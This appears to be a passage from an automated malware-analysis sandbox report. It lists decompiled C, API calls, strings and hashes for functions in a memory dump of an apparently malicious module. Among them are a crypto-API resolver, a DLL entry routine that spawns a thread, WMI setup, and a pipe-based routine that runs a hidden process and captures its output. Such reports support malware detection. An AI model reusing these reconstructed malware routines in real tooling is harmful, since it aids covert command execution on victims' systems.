0x0360e7f5
0x0360e80a
0x0360e817
0x0360e819
0x0360e81e
0x0360e81e
0x0360e825
0x0360e836
0x0360e83b
0x0360e83d
0x0360e83d
0x0360e851
0x0360e863
0x0360e865
0x0360e868
0x0360e86d
0x0360e86d
0x0360e874
0x0360e883
0x0360e887
0x0360e8c5
0x0360e8ca
0x0360e8d2
0x0360e8d7
0x0360e8e2
0x0360e8e8
0x0360e8f2
0x0360e8f5
0x0360e8fe
0x0360e903
0x0360e903
0x0360e90c
0x0360e955
0x0360e957
0x0360e95e
0x0360e95f
0x0360e962
0x0360e968
0x0360e96c
0x0360e96d
0x0360e972
0x0360e974
0x0360e97a
0x0360e98f
0x0360e997
0x0360e9cc
0x0360e9d1
0x0360e9d6
0x00000000
0x0360e9d8
0x0360e999
0x0360e99b
0x0360e99b
0x0360e9a4
0x0360e9a7
0x0360e9a9
0x0360e9ab
0x0360e9b1
0x0360e9b1
0x0360e9b6
0x0360e9b8
0x0360e9bf
0x0360e9bf
0x00000000
0x0360e9c2
0x0360e97c
0x0360e984
0x00000000
0x0360e90e
0x0360e90e
0x0360e914
0x0360e91a
0x0360e91d
0x00000000
0x0360e91d
0x0360e90c
0x0360e889
0x0360e88f
0x0360e893
0x0360e894
0x0360e899
0x0360e89b
0x0360e8a1
0x0360e8bf
0x0360e8bf
0x00000000
0x0360e8bf
0x0360e8a3
0x0360e8ad
0x0360e8af
0x0360e8b0
0x0360e8b5
0x0360e8b7
0x0360e8bd
0x00000000
0x00000000
0x00000000
0x0360e876
0x0360e876
0x0360e91f
0x0360e91f
0x0360e925
0x0360e928
0x00000000
0x0360e928
0x0360e827
0x0360e827
0x0360e92a
0x0360e92a
0x0360e930
0x0360e933
0x00000000
0x0360e933
0x0360e825
0x0360e790
0x0360e935
0x0360e938
0x0360e93a
0x0360e93d
0x0360e940
0x0360e949
0x0360e94e
0x00000000
0x00000000
0x0360e952
0x00000000
0x0360e952
0x0360e75f
0x00000000

APIs

memset.MSVCRT ref: 0360E6A5
memset.MSVCRT ref: 0360E6B6
memset.MSVCRT ref: 0360E70B
GetLastError.KERNEL32(?,?,?,?,?,?,00000000,000007D0,00000000), ref: 0360E790

Strings

POST, xrefs: 0360E856

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: memset$ErrorLast
String ID: POST
API String ID: 2570506013-1814004025
Opcode ID: 9ff26fc24ebf0dcdfbc8b4b9503b9dda121ebdea8bd94035e91868bb24c0a659
Instruction ID: 66c36c8654a8f073f1f1281289e35ee984be5ece8e5b807d958e1cd746c84d77
Opcode Fuzzy Hash: 9ff26fc24ebf0dcdfbc8b4b9503b9dda121ebdea8bd94035e91868bb24c0a659
Instruction Fuzzy Hash: 2DB17371900218AFDB15EFA4DD89E9FBBBCEF48310F14446AF505EB290DB759A40CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 036116C3, Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 70
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 28%

			E036116C3(signed int* _a4) {
				char _v8;
				_Unknown_base(*)()* _v12;
				_Unknown_base(*)()* _v16;
				char _v20;
				_Unknown_base(*)()* _t16;
				_Unknown_base(*)()* _t17;
				void* _t22;
				intOrPtr* _t28;
				signed int _t29;
				signed int _t30;
				struct HINSTANCE__* _t32;
				void* _t34;

				_t30 = 0;
				_v8 = 0;
				_t32 = GetModuleHandleA("advapi32.dll");
				if(_t32 == 0) {
					L9:
					return 1;
				}
				_t16 = GetProcAddress(_t32, "CryptAcquireContextA");
				_v12 = _t16;
				if(_t16 == 0) {
					goto L9;
				}
				_t17 = GetProcAddress(_t32, "CryptGenRandom");
				_v16 = _t17;
				if(_t17 == 0) {
					goto L9;
				}
				_t28 = GetProcAddress(_t32, "CryptReleaseContext");
				if(_t28 == 0) {
					goto L9;
				}
				_push(0xf0000000);
				_push(1);
				_push(0);
				_push(0);
				_push( &_v8);
				if(_v12() == 0) {
					goto L9;
				}
				_t22 = _v16(_v8, 4,  &_v20);
				 *_t28(_v8, 0);
				if(_t22 == 0) {
					goto L9;
				}
				_t29 = 0;
				do {
					_t30 = _t30 << 0x00000008 |  *(_t34 + _t29 - 0x10) & 0x000000ff;
					_t29 = _t29 + 1;
				} while (_t29 < 4);
				 *_a4 = _t30;
				return 0;
			}

0x036116cc
0x036116d3
0x036116dc
0x036116e0
0x0361175b
0x00000000
0x0361175d
0x036116ee
0x036116f0
0x036116f5
0x00000000
0x00000000
0x036116fd
0x036116ff
0x03611704
0x00000000
0x00000000
0x0361170e
0x03611712
0x00000000
0x00000000
0x03611714
0x03611719
0x0361171b
0x0361171c
0x03611720
0x03611726
0x00000000
0x00000000
0x03611731
0x0361173a
0x0361173e
0x00000000
0x00000000
0x03611740
0x03611742
0x0361174a
0x0361174c
0x0361174d
0x03611755
0x00000000

APIs

GetModuleHandleA.KERNEL32(advapi32.dll,00000000,00000000,00000000,03607640,?,?,00000000,?), ref: 036116D6
GetProcAddress.KERNEL32(00000000,CryptAcquireContextA), ref: 036116EE
GetProcAddress.KERNEL32(00000000,CryptGenRandom), ref: 036116FD
GetProcAddress.KERNEL32(00000000,CryptReleaseContext), ref: 0361170C

Strings

CryptGenRandom, xrefs: 036116F7
CryptReleaseContext, xrefs: 03611706
CryptAcquireContextA, xrefs: 036116E8
advapi32.dll, xrefs: 036116CE

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: AddressProc$HandleModule
String ID: CryptAcquireContextA$CryptGenRandom$CryptReleaseContext$advapi32.dll
API String ID: 667068680-129414566
Opcode ID: c84d79cc54098d65049b0350e4f2573c88260a3ef7f874c97738dfd014a5cba9
Instruction ID: 7800860c95894ac9d6b3ec7710c14c0e7298cd8da124294f9c04b43009365b00
Opcode Fuzzy Hash: c84d79cc54098d65049b0350e4f2573c88260a3ef7f874c97738dfd014a5cba9
Instruction Fuzzy Hash: 76115436A00619BADB11DBB98C98DBFBBB9AF46650F1C0464EB15E3341D670CA118AA4

Uniqueness

Uniqueness Score: -1.00%

Function 0361212D, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 98
stringCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E0361212D(char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
				signed int _t12;
				signed int _t13;
				int _t15;
				char* _t24;
				char* _t26;
				char* _t28;
				char* _t29;
				signed int _t40;
				char* _t43;
				char* _t45;
				long long* _t47;

				_t12 = _a20;
				if(_t12 == 0) {
					_t12 = 0x11;
				}
				_t26 = _a4;
				_push(_t30);
				 *_t47 = _a12;
				_push(_t12);
				_push("%.*g");
				_push(_a8);
				_push(_t26);
				L03612290();
				_t40 = _t12;
				if(_t40 < 0 || _t40 >= _a8) {
					L19:
					_t13 = _t12 | 0xffffffff;
					goto L20;
				} else {
					L036122D8();
					_t15 =  *((intOrPtr*)( *_t12));
					if(_t15 != 0x2e) {
						_t24 = strchr(_t26, _t15);
						if(_t24 != 0) {
							 *_t24 = 0x2e;
						}
					}
					if(strchr(_t26, 0x2e) != 0 || strchr(_t26, 0x65) != 0) {
						L11:
						_t43 = strchr(_t26, 0x65);
						_t28 = _t43;
						if(_t43 == 0) {
							L18:
							_t13 = _t40;
							L20:
							return _t13;
						}
						_t45 = _t43 + 1;
						_t29 = _t28 + 2;
						if( *_t45 == 0x2d) {
							_t45 = _t29;
						}
						while( *_t29 == 0x30) {
							_t29 = _t29 + 1;
						}
						if(_t29 != _t45) {
							E036086EC(_t45, _t29, _t40 - _t29 + _a4);
							_t40 = _t40 + _t45 - _t29;
						}
						goto L18;
					} else {
						_t6 = _t40 + 3; // 0x36109bd
						_t12 = _t6;
						if(_t12 >= _a8) {
							goto L19;
						}
						_t26[_t40] = 0x302e;
						( &(_t26[2]))[_t40] = 0;
						_t40 = _t40 + 2;
						goto L11;
					}
				}
			}

0x03612130
0x03612135
0x03612139
0x03612139
0x0361213e
0x03612143
0x03612144
0x03612147
0x03612148
0x0361214d
0x03612150
0x03612151
0x03612156
0x0361215d
0x03612203
0x03612203
0x00000000
0x0361216c
0x0361216c
0x03612173
0x03612177
0x0361217e
0x03612187
0x03612189
0x03612189
0x03612187
0x03612198
0x036121be
0x036121c7
0x036121c9
0x036121cf
0x036121fe
0x036121fe
0x03612206
0x03612209
0x03612209
0x036121d1
0x036121d2
0x036121d8
0x036121da
0x036121da
0x036121df
0x036121de
0x036121de
0x036121e6
0x036121f2
0x036121fc
0x036121fc
0x00000000
0x036121a8
0x036121a8
0x036121a8
0x036121ae
0x00000000
0x00000000
0x036121b0
0x036121b6
0x036121bb
0x00000000
0x036121bb
0x03612198

APIs

_snprintf.MSVCRT ref: 03612151
localeconv.MSVCRT ref: 0361216C
strchr.MSVCRT ref: 0361217E
strchr.MSVCRT ref: 0361218F
strchr.MSVCRT ref: 0361219D
strchr.MSVCRT ref: 036121C2

Strings

%.*g, xrefs: 03612148

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: strchr$_snprintflocaleconv
String ID: %.*g
API String ID: 1910550357-952554281
Opcode ID: e9e2bb11cd5b7c30722dd86478eb3b3a2d76cf5ef492399945dd52a9f932c3a2
Instruction ID: 9919f43df9f93d34e1688e108e6db5b8fbd4e6514661b35488924f985028df05
Opcode Fuzzy Hash: e9e2bb11cd5b7c30722dd86478eb3b3a2d76cf5ef492399945dd52a9f932c3a2
Instruction Fuzzy Hash: A421297660430E2AD725DA289CA6B6FBB9C9B01630F1C0959EB108F281D674D87083AC

Uniqueness

Uniqueness Score: -1.00%

Function 036102BD, Relevance: 10.9, APIs: 2, Strings: 4, Instructions: 445COMMON

Download Yara Rule

APIs

_snprintf.MSVCRT ref: 0361033D
qsort.MSVCRT ref: 036105BB

Strings

false, xrefs: 03610320
true, xrefs: 03610314
%I64d, xrefs: 0361032F
null, xrefs: 03610302

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: _snprintfqsort
String ID: %I64d$false$null$true
API String ID: 756996078-4285102228
Opcode ID: cfe9b315834ae06fba0f90bae4373b51d79bd5693fddc394e3ba6556b671431c
Instruction ID: 7ca177b86a91684ecb2445d7c1fd207abd9386f8247ca3a30027600d1f3cfc65
Opcode Fuzzy Hash: cfe9b315834ae06fba0f90bae4373b51d79bd5693fddc394e3ba6556b671431c
Instruction Fuzzy Hash: EAE18CB190020ABFDF11EF65CD46EAF3BA9FF15344F088059FD159A251E631CAB18BA4

Uniqueness

Uniqueness Score: -1.00%

Function 03605F6A, Relevance: 9.1, APIs: 6, Instructions: 104
COMMON

Download Yara Rule

C-Code - Quality: 77%

			_entry_(void* __edx, struct HINSTANCE__* _a4, WCHAR* _a8) {
				char _v8;
				char _v16;
				short _v144;
				short _v664;
				void* _t20;
				struct HINSTANCE__* _t23;
				long _t24;
				long _t25;
				char* _t29;
				WCHAR* _t34;
				long _t35;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t42;
				void* _t52;
				int _t56;
				void* _t57;
				intOrPtr* _t58;
				void* _t60;

				_t52 = __edx;
				if(_a8 != 1) {
					if(_a8 == 0) {
						_t42 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t42 + 0xc8))( *0x361e6a8, 0);
					}
					L15:
					return 1;
				}
				E036085D5();
				_t20 = E036097F2( &_v16);
				_t60 = _t52;
				if(_t60 < 0 || _t60 <= 0 && _t20 < 0x2e830) {
					goto L15;
				} else {
					E03608F5E();
					GetModuleHandleA(0);
					_t23 = _a4;
					 *0x361e69c = _t23;
					_t24 = GetModuleFileNameW(_t23,  &_v664, 0x104);
					_t25 = GetLastError();
					if(_t24 == 0 || _t25 == 0x7a) {
						L10:
						return 0;
					} else {
						memset( &_v144, 0, 0x80);
						_t58 = _t57 + 0xc;
						_t56 = 0;
						do {
							_t29 = E036095AD(_t56);
							_a8 = _t29;
							MultiByteToWideChar(0, 0, _t29, 0xffffffff,  &_v144, 0x3f);
							E036085A8( &_a8);
							_t56 = _t56 + 1;
						} while (_t56 < 0x2710);
						E03612A66( *0x361e69c);
						 *_t58 = 0x7c3;
						 *0x361e684 = E0360E1C7(0x361ba20, 0x11c);
						 *_t58 = 0xb4e;
						_t34 = E036095C7(0x361ba20);
						_a8 = _t34;
						_t35 = GetFileAttributesW(_t34);
						_push( &_a8);
						if(_t35 == 0xffffffff) {
							E036085BB();
							_v8 = 0;
							_t39 =  *0x361e684; // 0x530f6c8
							_t40 =  *((intOrPtr*)(_t39 + 0x70))(0, 0, E03605DEE, 0, 0,  &_v8);
							 *0x361e6a8 = _t40;
							if(_t40 != 0) {
								goto L15;
							}
							goto L10;
						}
						E036085BB();
						goto L10;
					}
				}
			}

0x03605f6a
0x03605f79
0x036060a6
0x036060a8
0x036060b6
0x036060b6
0x036060bc
0x00000000
0x036060be
0x03605f7f
0x03605f87
0x03605f8e
0x03605f90
0x00000000
0x03605fa3
0x03605fa3
0x03605fa9
0x03605faf
0x03605fbf
0x03605fc4
0x03605fcc
0x03605fd4
0x03606075
0x00000000
0x03605fe3
0x03605ff0
0x03605ff5
0x03605ff8
0x03605ffa
0x03605ffc
0x03606009
0x03606012
0x0360601b
0x03606020
0x03606021
0x0360602f
0x03606039
0x0360604a
0x0360604f
0x03606056
0x0360605d
0x03606060
0x0360606c
0x0360606d
0x03606079
0x03606082
0x03606086
0x03606094
0x03606097
0x0360609e
0x00000000
0x00000000
0x00000000
0x036060a0
0x0360606f
0x00000000
0x03606074
0x03605fd4

APIs

Part of subcall function 036085D5: HeapCreate.KERNELBASE(00000000,00080000,00000000,03605F84), ref: 036085DE

Part of subcall function 036097F2: GetSystemTimeAsFileTime.KERNEL32(?,?,03605F8C), ref: 036097FF

GetModuleHandleA.KERNEL32(00000000), ref: 03605FA9
GetModuleFileNameW.KERNEL32(?,?,00000104), ref: 03605FC4
GetLastError.KERNEL32 ref: 03605FCC
memset.MSVCRT ref: 03605FF0
MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,0000003F), ref: 03606012
GetFileAttributesW.KERNEL32(00000000), ref: 03606060

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: File$ModuleTime$AttributesByteCharCreateErrorHandleHeapLastMultiNameSystemWidememset
String ID:
API String ID: 3148476078-0
Opcode ID: 3b250c2393acc91253873e1b2efb341405f1fb4cc81b14c3557d5bb197ec55c1
Instruction ID: 6f9e0900ec3693d8f654f76c07bc3c5b8b37d79f697f5effd84b3678816b9453
Opcode Fuzzy Hash: 3b250c2393acc91253873e1b2efb341405f1fb4cc81b14c3557d5bb197ec55c1
Instruction Fuzzy Hash: 7D310574840204EFDB19FB60DE4AE6F77B9EB44710F08852EE8168B2C8EB348651CF65

Uniqueness

Uniqueness Score: -1.00%

Function 0360D753, Relevance: 9.1, APIs: 6, Instructions: 87memoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(00000000), ref: 0360D767
SysAllocString.OLEAUT32(?), ref: 0360D76F
SysAllocString.OLEAUT32(00000000), ref: 0360D783
SysFreeString.OLEAUT32(?), ref: 0360D7FE
SysFreeString.OLEAUT32(?), ref: 0360D801
SysFreeString.OLEAUT32(?), ref: 0360D806

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: String$AllocFree
String ID:
API String ID: 344208780-0
Opcode ID: c644bf33bb224da03ecffd6561aa4a25b4365f133c8d92148141397f4d20153a
Instruction ID: b5794a60703e1655abd508e690bd518eb571c5e6977f6daab278b6ffdc061ab0
Opcode Fuzzy Hash: c644bf33bb224da03ecffd6561aa4a25b4365f133c8d92148141397f4d20153a
Instruction Fuzzy Hash: E721FB75900218BFDB04DFE5CC89DAFBBBDEF48254B14449AE505AB250DB70AE01CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03610802, Relevance: 7.7, APIs: 2, Strings: 3, Instructions: 158COMMON

Download Yara Rule

Strings

@, xrefs: 03610870
\u%04X, xrefs: 0361091C
\u%04X\u%04X, xrefs: 0361095B

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID:
String ID: @$\u%04X$\u%04X\u%04X
API String ID: 0-2132903582
Opcode ID: 9a2ee2074dd9633d6084e9880d6d53dbc977249ff46abc2752b694d0b4d60494
Instruction ID: 229b2f2f3dc1101f7f9247e00787198064a86f1198b860f6eb95bf7faa8dacdb
Opcode Fuzzy Hash: 9a2ee2074dd9633d6084e9880d6d53dbc977249ff46abc2752b694d0b4d60494
Instruction Fuzzy Hash: 5A414E71B042099BEF68CD6C8EAABBEBA29DF05310F1C0516FD41D7345D2A1C9F192D1

Uniqueness

Uniqueness Score: -1.00%

Function 0360D52E, Relevance: 7.6, APIs: 5, Instructions: 87
commemoryCOMMON

Download Yara Rule

C-Code - Quality: 30%

			E0360D52E(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x361b840, 0, 1, 0x361b850, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E036085EA(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}

0x0360d53b
0x0360d53e
0x0360d541
0x0360d552
0x0360d558
0x0360d569
0x0360d571
0x0360d5c2
0x0360d5c2
0x0360d5c7
0x0360d5cc
0x0360d5cc
0x0360d5cf
0x0360d5d4
0x0360d5d9
0x0360d5d9
0x0360d5dc
0x0360d573
0x0360d574
0x0360d57a
0x0360d58b
0x0360d590
0x00000000
0x0360d592
0x0360d59f
0x0360d5a7
0x00000000
0x0360d5a9
0x0360d5ab
0x0360d5b3
0x00000000
0x0360d5b5
0x0360d5b8
0x0360d5be
0x0360d5be
0x0360d5b3
0x0360d5a7
0x0360d590
0x0360d5e1

APIs

CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D541
CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D552
CoCreateInstance.OLE32(0361B840,00000000,00000001,0361B850,?,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D569
SysAllocString.OLEAUT32(00000000), ref: 0360D574
CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,0360D82E,00000C5B,00000000,?,00000000), ref: 0360D59F

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
String ID:
API String ID: 1610782348-0
Opcode ID: 2c4f9aae03d150b8a1695702392dbad7fb4b6775f799cb137f73131a87c9d4e5
Instruction ID: 09689f36d428e4e64cea025b0308c37a01738594c8c9faef15629433fdf34f49
Opcode Fuzzy Hash: 2c4f9aae03d150b8a1695702392dbad7fb4b6775f799cb137f73131a87c9d4e5
Instruction Fuzzy Hash: EF21F871700245BFD7299BA2CC4EE6BBF7CEFC6B15F14455DB906A7294C6709A01CA30

Uniqueness

Uniqueness Score: -1.00%

Function 0361220A, Relevance: 7.6, APIs: 5, Instructions: 52
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E0361220A(char* __eax, char** _a4, long long* _a8) {
				char* _v8;
				long long _v16;
				char* _t9;
				signed char _t11;
				char** _t19;
				char _t22;
				long long _t32;
				long long _t33;

				_t9 = __eax;
				L036122D8();
				_t19 = _a4;
				_t22 =  *__eax;
				if( *_t22 != 0x2e) {
					_t9 = strchr( *_t19, 0x2e);
					if(_t9 != 0) {
						 *_t9 =  *_t22;
					}
				}
				L0361229C();
				 *_t9 =  *_t9 & 0x00000000;
				_t11 = strtod( *_t19,  &_v8);
				asm("fst qword [ebp-0xc]");
				_t32 =  *0x3618248;
				asm("fucomp st1");
				asm("fnstsw ax");
				if((_t11 & 0x00000044) != 0) {
					L5:
					st0 = _t32;
					L0361229C();
					if( *_t11 != 0x22) {
						_t33 = _v16;
						goto L8;
					} else {
						return _t11 | 0xffffffff;
					}
				} else {
					_t33 =  *0x3618250;
					asm("fucomp st1");
					asm("fnstsw ax");
					if((_t11 & 0x00000044) != 0) {
						L8:
						 *_a8 = _t33;
						return 0;
					} else {
						goto L5;
					}
				}
			}

0x0361220a
0x03612212
0x03612217
0x0361221a
0x0361221f
0x03612225
0x0361222e
0x03612232
0x03612232
0x0361222e
0x03612234
0x03612239
0x03612242
0x03612247
0x0361224a
0x03612253
0x03612255
0x0361225c
0x0361226d
0x0361226d
0x0361226f
0x03612277
0x0361227e
0x00000000
0x03612279
0x0361227d
0x0361227d
0x0361225e
0x0361225e
0x03612264
0x03612266
0x0361226b
0x03612281
0x03612284
0x03612289
0x00000000
0x00000000
0x00000000
0x0361226b

APIs

localeconv.MSVCRT ref: 03612212
strchr.MSVCRT ref: 03612225
_errno.MSVCRT ref: 03612234
strtod.MSVCRT ref: 03612242
_errno.MSVCRT ref: 0361226F

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: _errno$localeconvstrchrstrtod
String ID:
API String ID: 1035490122-0
Opcode ID: d310b3dc1a1b2d08446545c70640cd7d9a5e3513331002ebe5804262253d6208
Instruction ID: f1345d1da72f6ba6f197c249ea9af2b64dbe99335a5cef65423bc3de913bc0c5
Opcode Fuzzy Hash: d310b3dc1a1b2d08446545c70640cd7d9a5e3513331002ebe5804262253d6208
Instruction Fuzzy Hash: FE01D43990020DAADF12FF24E91469DFBA4AF4B360F2C09D4D9806B1D5CB748475CBAC

Uniqueness

Uniqueness Score: -1.00%

Function 0360A99D, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177
pipeCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E0360A99D(signed int __ecx) {
				void* _v8;
				void* _v12;
				void* _v16;
				void* _v20;
				signed int _v24;
				char _v28;
				char _v32;
				char _v36;
				struct _SECURITY_ATTRIBUTES _v48;
				intOrPtr _v60;
				char _v64;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				short _v92;
				intOrPtr _v96;
				void _v140;
				intOrPtr _t77;
				void* _t79;
				intOrPtr _t85;
				intOrPtr _t87;
				intOrPtr _t89;
				intOrPtr _t92;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr _t102;
				long _t111;
				intOrPtr _t115;
				intOrPtr _t126;
				void* _t127;
				void* _t128;
				void* _t129;
				void* _t130;

				_t111 = 0;
				_v24 = __ecx;
				_v12 = 0;
				_v20 = 0;
				_t127 = 0;
				_v8 = 0;
				_v16 = 0;
				_v48.nLength = 0xc;
				_v48.lpSecurityDescriptor = 0;
				_v48.bInheritHandle = 1;
				_v28 = 0;
				memset( &_v140, 0, 0x44);
				asm("stosd");
				_t130 = _t129 + 0xc;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				if(CreatePipe( &_v12,  &_v20,  &_v48, 0) == 0) {
					L18:
					return 0;
				}
				if(CreatePipe( &_v8,  &_v16,  &_v48, 0) == 0) {
					L13:
					E03608600( &_v28, 0);
					if(_v20 != 0) {
						_t77 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t77 + 0x30))(_v20);
					}
					if(_v8 != 0) {
						_t115 =  *0x361e684; // 0x530f6c8
						 *((intOrPtr*)(_t115 + 0x30))(_v8);
					}
					return _t111;
				}
				_t79 = _v16;
				_v76 = _t79;
				_v80 = _t79;
				_v84 = _v12;
				_v140 = 0x44;
				_v96 = 0x101;
				_v92 = 0;
				_t126 = E036085EA(0x1001);
				_v28 = _t126;
				if(_t126 == 0) {
					goto L18;
				}
				_push( &_v64);
				_push( &_v140);
				_t85 =  *0x361e684; // 0x530f6c8
				_push(0);
				_push(0);
				_push(0x8000000);
				_push(1);
				_push(0);
				_push(0);
				_push(_v24);
				_push(0);
				if( *((intOrPtr*)(_t85 + 0x38))() == 0) {
					goto L13;
				}
				_t87 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t87 + 0x30))(_v12);
				_t89 =  *0x361e684; // 0x530f6c8
				 *((intOrPtr*)(_t89 + 0x30))(_v16);
				_v24 = _v24 & 0;
				do {
					_t92 =  *0x361e684; // 0x530f6c8
					_v36 =  *((intOrPtr*)(_t92 + 0x88))(_v8, _t126, 0x1000,  &_v24, 0);
					 *((char*)(_v24 + _t126)) = 0;
					if(_t111 == 0) {
						_t127 = E0360918C(_t126, 0);
					} else {
						_push(0);
						_push(_t126);
						_v32 = _t127;
						_t127 = E03609278(_t127);
						E03608600( &_v32, 0xffffffff);
						_t130 = _t130 + 0x14;
					}
					_t111 = _t127;
					_v32 = _t127;
				} while (_v36 != 0);
				_push( &_v36);
				_push(E0360C384(_t127));
				_t98 =  *0x361e68c; // 0x530f890
				_push(_t127);
				if( *((intOrPtr*)(_t98 + 0xb8))() != 0) {
					L12:
					_t100 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t100 + 0x30))(_v64);
					_t102 =  *0x361e684; // 0x530f6c8
					 *((intOrPtr*)(_t102 + 0x30))(_v60);
					goto L13;
				}
				_t128 = E0360923C(_t127);
				if(_t128 == 0) {
					goto L12;
				}
				E03608600( &_v32, 0);
				return _t128;
			}

0x0360a9a8
0x0360a9aa
0x0360a9b6
0x0360a9bb
0x0360a9be
0x0360a9c0
0x0360a9c3
0x0360a9c6
0x0360a9cd
0x0360a9d0
0x0360a9d7
0x0360a9da
0x0360a9e4
0x0360a9e5
0x0360a9e8
0x0360a9ea
0x0360a9eb
0x0360aa02
0x0360ab82
0x00000000
0x0360ab82
0x0360aa19
0x0360ab4e
0x0360ab54
0x0360ab5f
0x0360ab61
0x0360ab69
0x0360ab69
0x0360ab70
0x0360ab72
0x0360ab7b
0x0360ab7b
0x00000000
0x0360ab7e
0x0360aa1f
0x0360aa22
0x0360aa25
0x0360aa2b
0x0360aa35
0x0360aa3f
0x0360aa46
0x0360aa4f
0x0360aa51
0x0360aa57
0x00000000
0x00000000
0x0360aa62
0x0360aa69
0x0360aa6a
0x0360aa6f
0x0360aa70
0x0360aa71
0x0360aa76
0x0360aa78
0x0360aa79
0x0360aa7a
0x0360aa7d
0x0360aa83
0x00000000
0x00000000
0x0360aa89
0x0360aa91
0x0360aa94
0x0360aa9c
0x0360aa9f
0x0360aaa2
0x0360aaa8
0x0360aabc
0x0360aac2
0x0360aac8
0x0360aaf1
0x0360aaca
0x0360aaca
0x0360aacc
0x0360aace
0x0360aad6
0x0360aade
0x0360aae3
0x0360aae3
0x0360aaf7
0x0360aaf9
0x0360aaf9
0x0360ab01
0x0360ab09
0x0360ab0a
0x0360ab0f
0x0360ab18
0x0360ab38
0x0360ab38
0x0360ab40
0x0360ab43
0x0360ab4b
0x00000000
0x0360ab4b
0x0360ab21
0x0360ab25
0x00000000
0x00000000
0x0360ab2d
0x00000000

APIs

memset.MSVCRT ref: 0360A9DA
CreatePipe.KERNEL32(?,?,0000000C,00000000,00000000,00000000,00000000), ref: 0360A9FE
CreatePipe.KERNEL32(0360658F,?,0000000C,00000000), ref: 0360AA15

Part of subcall function 036085EA: RtlAllocateHeap.NTDLL(00000008,?,?,03608F6A,00000100,?,03605FA8), ref: 036085F8

Part of subcall function 03608600: RtlFreeHeap.NTDLL(00000000,00000000,00000001,000000FF,03606020), ref: 03608646

Strings

D, xrefs: 0360AA35

Memory Dump Source

Source File: 00000004.00000002.951544528.0000000003600000.00000040.00020000.sdmp, Offset: 03600000, based on PE: true

Similarity

API ID: CreateHeapPipe$AllocateFreememset
String ID: D
API String ID: 2365139273-2746444292
Opcode ID: 0b3c688a8dd84c9c04ec08c98692dfc30fe2eb3d50c1118510bf4c806ee7ab0d
Instruction ID: a62b6490877683892db80ba05156e271bb716af4d3d1b5248d3fc65e03a147ba
Opcode Fuzzy Hash: 0b3c688a8dd84c9c04ec08c98692dfc30fe2eb3d50c1118510bf4c806ee7ab0d
Instruction Fuzzy Hash: B9515972910209AFDB14DFE8C885FDFB7B9AF08300F54416AF500E7290DB719A058B65

Uniqueness

